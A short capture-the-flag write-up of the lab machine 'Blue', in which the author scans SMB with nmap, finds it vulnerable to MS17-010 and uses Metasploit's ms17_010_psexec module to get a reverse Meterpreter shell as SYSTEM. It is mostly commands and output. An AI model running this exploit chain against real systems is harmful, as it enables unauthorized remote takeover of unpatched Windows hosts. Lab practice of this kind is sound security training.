Following on from Legacy in number of pwns is Blue. I have heard of this one, and the name is a giveaway. Is it pretty much a clone of Legacy?


Not exactly; there are a bunch more ports for a start:

  1. 135/tcp open msrpc
  2. 139/tcp open netbios-ssn
  3. 445/tcp open microsoft-ds
  4. 49152/tcp open unknown
  5. 49153/tcp open unknown
  6. 49154/tcp open unknown
  7. 49155/tcp open unknown
  8. 49156/tcp open unknown
  9. 49157/tcp open unknown


We’ll do the same scan as Legacy:

└─# nmap -p445 --script smb-vuln-ms17-010
Starting Nmap 7.91 ( ) at 2021-03-05 05:42 EST
Nmap scan report for
Host is up (0.24s latency).

445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:

Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds

And we’ll get the same result.

Yeeting MSF again again

I’ve never used Metasploit three times in an evening before. First time for everything I guess:

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 
[*] - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] - Built a write-what-where primitive...
[+] - Overwrite complete... SYSTEM session obtained!
[*] - Selecting PowerShell target
[*] - Executing the payload...
[+] - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-03-05 05:45:16 -0500

meterpreter > shell
Process 1564 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\system

Well, it’s a different version of the OS I guess. Devel will be next, but that’s for tomorrow.